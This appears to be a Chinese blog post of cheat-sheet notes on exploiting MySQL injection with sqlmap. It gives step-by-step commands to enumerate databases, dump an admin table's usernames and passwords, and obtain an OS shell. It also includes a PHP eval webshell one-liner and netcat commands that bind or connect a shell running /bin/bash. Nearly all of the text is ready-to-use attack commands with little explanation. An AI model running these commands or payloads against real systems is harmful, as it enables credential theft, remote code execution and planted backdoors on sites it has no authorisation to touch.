• sqlmap从入门到精通-第五章-5-3 使用sqlmap进行MySQL注入并渗透


    5.3 使用sqlmap进行MySQL注入并渗透

    这一小节没什么东西,作者前面都讲过,这里算是基本都是重复,大家看看,作为一个备忘录吧

    5.3.1 检测SQL注入点

    sqlmap.py -u "http://www.xx.com/index.php?id=3"

    5.3.2 获取当前数据库信息

    sqlmap.py -u "http://www.xx.com/index.php?id=3" --current-db

    5.3.3 获取当前数据库表

    sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx --tables

    5.3.4 获取表列和数据

    sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx -T admin --columns

    sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx -T admin -C id,username,password --dump

    5.3.5 获取webshell

    1. 获取网站信息

    --os-shell

    2. 获取webshell

    echo "<?php @eval($_POST['bmfx']);?>" > bmfx.php

    5.3.6 总结及技巧

    1. 自动提交参数和智能进行注入 sqlmap -u url --batch --smart

    2. 获取所有信息 sqlmap -u url --batch --smart -a

    3. 导出数据库 sqlmap -u url --dump-all

    4. 直接连接数据库 sqlmap -d "mysql://root:root@127.0.0.1:3306/bmfx" -f --banner --dbs --users

    这里如果是root权限可以直接使用--os-shell

    5. 直接获取webshell sqlmap -u url --os-shell

    6. 在Linux反弹shell

    nc -l -p 9988 -e /bin/bash

    nc xxxxx 9988


     
  • 相关阅读:
    627. whose 和 who's
    628. why 和why not
    629 will: 各种用法tyg
    enChapter 3 Underlying Technologiesp
    使用VIEWER.JS进行简单的图片预览
    outlook2010设置失败后重新设置
    新增和编辑clob字段
    金钱大写
    pivot 与 unpivot 函数是SQL05新提供的2个函数
    从函数到委托
  • 原文地址:https://www.cnblogs.com/autopwn/p/13279692.html
Copyright © 2020-2023  润新知